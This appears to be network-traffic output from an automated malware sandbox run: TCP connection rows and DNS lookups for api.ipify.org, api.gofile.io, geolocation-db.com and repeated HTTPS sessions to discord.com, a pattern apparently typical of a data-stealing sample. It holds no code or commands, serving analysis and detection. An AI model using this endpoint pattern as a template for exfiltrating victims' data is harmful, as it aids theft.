                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:19.685481071 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:19.685534000 CEST44349784162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:19.685604095 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:19.685956001 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:19.685977936 CEST44349784162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.151156902 CEST44349784162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.151719093 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.151753902 CEST44349784162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.153038979 CEST44349784162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.153112888 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.154524088 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.154628038 CEST44349784162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.154663086 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.154747009 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.154753923 CEST44349784162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.205419064 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.339394093 CEST44349784162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.339560986 CEST44349784162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.339622974 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.340105057 CEST49784443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.554852962 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.554913044 CEST44349785172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.554991007 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.555402994 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:20.555416107 CEST44349785172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.030831099 CEST44349785172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.031327963 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.031357050 CEST44349785172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.034953117 CEST44349785172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.035043001 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.036195993 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.036319971 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.036722898 CEST44349785172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.084923983 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.084940910 CEST44349785172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.131886959 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.218425989 CEST44349785172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.218554974 CEST44349785172.67.74.152192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.219152927 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.219255924 CEST49785443192.168.2.8172.67.74.152
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.220334053 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.220364094 CEST44349786159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.220451117 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.220823050 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:21.220834970 CEST44349786159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.066060066 CEST44349786159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.066643953 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.066677094 CEST44349786159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.068289042 CEST44349786159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.068361998 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.069608927 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.069717884 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.069725990 CEST44349786159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.115392923 CEST44349786159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.116142035 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.116152048 CEST44349786159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.163253069 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.261260033 CEST44349786159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.261384964 CEST44349786159.89.102.253192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.261431932 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.261862993 CEST49786443192.168.2.8159.89.102.253
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.262937069 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.262998104 CEST44349787162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.263070107 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.263417959 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.263430119 CEST44349787162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.727447987 CEST44349787162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.728015900 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.728099108 CEST44349787162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.731338978 CEST44349787162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.731453896 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.732645988 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.732743979 CEST44349787162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.732770920 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.732800961 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.732812881 CEST44349787162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.788031101 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.935147047 CEST44349787162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.935312986 CEST44349787162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.935362101 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.935872078 CEST49787443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.937000990 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.937036991 CEST44349788162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.937119961 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.937529087 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:22.937540054 CEST44349788162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.407759905 CEST44349788162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.408186913 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.408221006 CEST44349788162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.409859896 CEST44349788162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.409919977 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.411127090 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.411221981 CEST44349788162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.411236048 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.411273956 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.411281109 CEST44349788162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.459937096 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.601577044 CEST44349788162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.601771116 CEST44349788162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.601838112 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.607074022 CEST49788443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.611443996 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.611499071 CEST44349789162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.611596107 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.615334988 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:23.615346909 CEST44349789162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.088996887 CEST44349789162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.089410067 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.089437008 CEST44349789162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.090899944 CEST44349789162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.090961933 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.092216015 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.092305899 CEST44349789162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.092367887 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.092377901 CEST44349789162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.092398882 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.135402918 CEST44349789162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.135848999 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.283596992 CEST44349789162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.284003019 CEST44349789162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.284076929 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.284480095 CEST49789443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.285629034 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.285661936 CEST44349790162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.285753012 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.286127090 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.286142111 CEST44349790162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.762697935 CEST44349790162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.763324976 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.763355970 CEST44349790162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.764435053 CEST44349790162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.764503956 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.765705109 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.765772104 CEST44349790162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.765804052 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.765880108 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.765889883 CEST44349790162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.819412947 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.950994968 CEST44349790162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.951380014 CEST44349790162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.951479912 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.951875925 CEST49790443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.953071117 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.953170061 CEST44349791162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.953277111 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.953623056 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:24.953659058 CEST44349791162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.429636002 CEST44349791162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.430114985 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.430134058 CEST44349791162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.431189060 CEST44349791162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.431262016 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.432429075 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.432483912 CEST44349791162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.432553053 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.432637930 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.432643890 CEST44349791162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.475543976 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.627696037 CEST44349791162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.627957106 CEST44349791162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.628024101 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.628603935 CEST49791443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.629754066 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.629811049 CEST44349792162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.629899025 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.630291939 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:25.630309105 CEST44349792162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.100142956 CEST44349792162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.100963116 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.100996017 CEST44349792162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.102418900 CEST44349792162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.102489948 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.103632927 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.103722095 CEST44349792162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.103744030 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.103827000 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.103832960 CEST44349792162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.149564981 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.294634104 CEST44349792162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.294781923 CEST44349792162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.294837952 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.309916973 CEST49792443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.310884953 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.310928106 CEST44349793162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.310997009 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.311297894 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.311316013 CEST44349793162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.781514883 CEST44349793162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.782018900 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.782038927 CEST44349793162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.783106089 CEST44349793162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.783169985 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.784346104 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.784414053 CEST44349793162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.784504890 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.784512043 CEST44349793162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.784538984 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.831396103 CEST44349793162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.834914923 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.959709883 CEST44349793162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.959857941 CEST44349793162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.959918022 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.960550070 CEST49793443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.961669922 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.961695910 CEST44349794162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.961780071 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.962167978 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:26.962176085 CEST44349794162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.428033113 CEST44349794162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.428960085 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.428977966 CEST44349794162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.430104017 CEST44349794162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.430324078 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.431737900 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.431838036 CEST44349794162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.431878090 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.431962013 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.431972980 CEST44349794162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.475585938 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.625909090 CEST44349794162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.626055956 CEST44349794162.159.136.232192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.626116037 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:19:27.626718044 CEST49794443192.168.2.8162.159.136.232
                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:43.982969999 CEST6379653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:43.989835024 CEST53637961.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:44.024101019 CEST5257053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:44.032499075 CEST53525701.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:44.679270029 CEST6492253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:44.694757938 CEST53649221.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:46.023154974 CEST6479653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:46.030283928 CEST53647961.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:43.982969999 CEST192.168.2.81.1.1.10xc350Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:44.024101019 CEST192.168.2.81.1.1.10xdfc3Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:44.679270029 CEST192.168.2.81.1.1.10xbd2Standard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:46.023154974 CEST192.168.2.81.1.1.10xce2eStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:43.989835024 CEST1.1.1.1192.168.2.80xc350No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:43.989835024 CEST1.1.1.1192.168.2.80xc350No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:43.989835024 CEST1.1.1.1192.168.2.80xc350No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:44.032499075 CEST1.1.1.1192.168.2.80xdfc3No error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:44.694757938 CEST1.1.1.1192.168.2.80xbd2No error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:46.030283928 CEST1.1.1.1192.168.2.80xce2eNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:46.030283928 CEST1.1.1.1192.168.2.80xce2eNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:46.030283928 CEST1.1.1.1192.168.2.80xce2eNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Sep 27, 2024 18:18:46.030283928 CEST1.1.1.1192.168.2.80xce2eNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
